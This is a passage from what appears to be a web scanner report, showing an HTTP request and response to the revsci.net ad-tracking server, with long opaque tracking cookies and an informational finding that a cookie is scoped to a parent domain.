NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_s5cG="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbg+e3VA0m2LzBczWmMLdaJpq0puyTRQyGEfONQV6XrEbPpAc8e2VDA3Fy31gPZUZAJJsTqWaE97/6FPY2NufszctJYIDjVFtpyMpyCIElunN//cgZgF0uQAza2dosahuYJcuvsb4Mmoc6lkv9WbD3FYqLNEgTceYqMqHncmBdVUo+aMLOPUnNVMY74QZib5NVQs8YpdLFM5iwaoTFMO8KNu74BUc1x2mtz2QkiHglJytV7Ivihe3TNpqwl+Ehiqimxpb3M+r8O4Y+uAnsBFs7z8x3+/3jJS0ZbUKefBU5w/Z9nhfrfFt6njYVTUtKrMv363V4m0Cf1/VRsOeB/C0/9h7rLqbdrJ0PY1wY51YOzE32mIxyawgGWw2kcj1j4N8KRb9CicZvR9ANcTd1icA2wAQBf8KCt3tiANWmN8X6DWY6hWU6rDNpUSbRO2jlsbVNPqx7UL8WFj9sYIt8C9M2/axuMnFHdqQpiL4Ddn8cZcLAOwMm+JdzgcjoQx0in9SnyZgCUGEi/OvjeKJmTPMGFatSBajfJVTo1kpQi15L0BelSy1W0HTIZ1erqMVnEDnqeINDU7ufTgFMRm7zxfe8YYF+atyBupQ/TP1wC/GQeazkjq5PceKd+Rh7S9paOQL1yexe2vgGi7TGUbsrljHaKHRKHrC+d1Y9WfF8YngQcxajoOMmAZVd239wPQLFqRhR7p946PXCjInoCk9m5ON5YkS4YjFvDLP8IuCX+dcbKMUXYR2ohdiwLiwEfWxU7kF9cNkba8qxchQyQWHK3RDZTrjyIvi9f7dD7HXOwVIzRkbfIrkxYHCz380z0NqdkVk+NfaJkud+pggFL1HSwe53rGpLU0cokk+b7txcitPpIKQs3LBgeYp7nZvKa1Je2cPcX5bR4Z3OO/SoYugcKofD+IpniJb6xqWFh2w3lS2fXYgSInda8j+DU7c+Q9UbebkhpVujwFGdZbE9DbrHGoVX6TNyrEJCF2ZszL5FA2E+o/PiOFlVjmgaEhC91tcLPvTO1fUjpJ67A8tqfUW8xQivfPxFVgaoYREELaG47yk0hJ1tNMrqHHYWRL4k81veWq6ljDqeEQuBs6rFu6rTfDfuGcan5PS/RsAj1kLGzh1I7Ag5ETkZ233mGzpWMqZ3mX3HshobI5+orjs1jqw5p5n62EBU8LS+I51Zn8zVO7gRvzZdlnAbjTxgKT2b/KVmv7ketc94734OK2SI3b4/o23sooQC94NfJe7ybxeuhm4fQRY31M6xKA56x/AfmSTG7SqQGLd/SKIJrtrXMyV1azVRbo2Xg="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklbhyJCnxDgB9CFQA1kPsZF7mtNPw4ptcL5Ctbrt5PUxGRUlQamUvZIBZOhHhqaWIknb5LxbfPjNdHiOI3+L71fEzWoRn+y4+5eRBTByQ7gkvqh/99HNVJg0Mhx7jT93632OtMFe7ldendZZd8NDEWPbpffS+GCpH6QqL2hsceChO/XL4EGbINZF9Qi2qEn7l9OZaOmvg0qDTl+Y3fcKZvr4j4pAF1BzxjmibF2GJbKtRn0KC35m5ml4Z5LApFxb/CiPL7JUl48ouIu7qWXjHBJeyxrMgxdOisTldj3/E2OpD+rwDxm9OZaG2T/zFtCloP6m0ZukU3G+1W79P+nS3NI8L/b1JRdufb7yEj0PWuyHmTy5ErQQkZdUhaSFExyU5KaSZGnOUmaSSK0KsNpkn9goI6RyOKRuCxqW6Y6L4x9LUrPiX/+AkKyLYUsAYUCgIQtU3UVO9MQ7M0nI0gHn/YOcrt8JEh3b6lbkVwvb+7pjF3OFasg6lsdnecccbs7u/mc8fAX83E9pgEmRJ3LXPHVktd2HeDBqBsrcxnSv0l6Zg78apOPubX52OcSFvO6lciUX9Q5DbN9BDF0xlk3R/0KGYOtUCvx0C1+NBg7oW9E+/J32wKoCCbBu4KL9NbqpY+903rH0fWmh8GrhAY0n5Y0P6kCXIiEmxLSOrAm5MEPF4CfEw304xSuEEGAkud/d8wWUH+9BvgKx3YYmyMRAf2ZeYdz8KlXfW1BcY02UtLT7xCy5wzegcvOR5I0exGUg17fF+94+6j4nAqVMvW7aenskzCS3f7yIvj/xieg+HlUh+WD8+dyUcDEudUTgOn/9p30D3exBHDmyySEaS+k4tEec0RxFpLAU/oKZ8XhjGz0wj2RXbp6SY+sNuvjEZu8Lk5wXl0HbnRMvv49BzNhMDxntv8UabacrPCXOEZIVi1FF89L0H4j+yIaHs+mOPlRho2lNn+2sKlIqwwqN4aD6+JY4EsIM3pOwuKZqhrxkjJAc4R4MzCiNSnTOHqcMa3UmEnzE5jfd+XTdxWu5s+vqVHcx3cglWcOZXgbOE9mIEDkGqQch7eV8z8LL5LVQOqf+ygnDRhf+74iN5EQimqqFyoPrE8QMYBZ7o9deP0HBNg8I5J217T4J6rTskxNbpP0KEAwZrsudLacKi/LuEST3eRY0mmovfb8FDkX5cThtKSjZ62BKyKY1xKzUSHJfsWvamEvP7t7VkdnDkFOoyET7+JpbrRHk9msl0dUtRT6O1laq7+hat06IJqZj2lbGE3P5PjBAOAYBoyFx2jV4j5rHPkKC/6nNmFnXlH6QXTLRmCFX2YuzoEsnzzB8MWwjzx7UydFwa0s2juTD+nN/bMLwgLPOnf/OUbyhDiHIa0Z40kEU+shFWFPkeNT7bS6lg54LBLPFDhXAVOvomNpZtrEDXtqzrjZjfH4lUilaps7Lfez4NizQRUzJyASf9Ra4CFDTBdqxuOSCVllk7hNyoMQueH5U19fbMVVZPfse3Nnnel4ve/OZ7ZPiCGWcLUzVuzy8J6tNZkg0CrA7ruA+yoVl0dhNtv2/cObm1BB7Z0gM2OdC6ziZzCp+FIqQuqM38KmUoIPecSyIgffoLHHUyLVnor0XG5lcqVU9+9ij6V+DDyNownTsAUJbfrpG2id1H5DgbX2xPi19xFIDOQ4pjg62D+R0v5EBMdQT6GTQxucssggWnTOsHXzbp6h4="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7z9JBhn/5/LhztSBArx9QwfGZXN0Lbk6M79eT/3+cOXz8vI9WmFIBkVY8jHk+hy/QhzLLFqhPfF3QeYfcnkfI6kItnYJN04FPGH8JvyZk5CgNRKHSQw0cLNwnCnp3H2FVPBeApsnc+bPQELVw7zHIz+Awb0w5kLYRZFv5z25yO3tlbXMIhYgOcVdvYvqNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:18:01 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:18:01 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.186. http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/743306396.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnY4hOkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrUXETRdDjDrhFtW8Q3YBu7LH0BpOZEkQ7qgbtIpSGhnXHaGeIdDCL4J/EIpOfB2LpopMTQBonSYtNsSOFv3mTmNF6kgYFHWqkKotp3Ph6zGsbpHmcoVxKLDjaQ1ChU6atbm5fFWrFFMTh5ZihsyERjUDjxTeKWeKeRY0gNIwIlZkQZOLlk8uZfxFeqiNuC1rBBItAl4Lntw6epFlDHMO4w/LnMOPcO16hfaP1c2HXavcINK+Ha6jdzz882yisW4ZNXZ0/EfYV6qz6m/ZYwwogtLmNexg3zwQvHA7cimsoGkc/zKBFmhTLYOk3JVzYm/8hG9pSKUUhwaiKvYsTVArhovtcyX8hYUhv01pHi7zlqUdxGLqcaO1H6VCi8cDciF/ZP4ms7zKN2uHCi5MyRzA038Wznt+lmcN1ePCUy4Znt1LIBdpwYVX8Ixvp6/6oo3uaQyuE+Oc5jUUhPy8bwGC775SChwg8S5OmUN8MQxPOaP02; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:00:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/743306396.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnj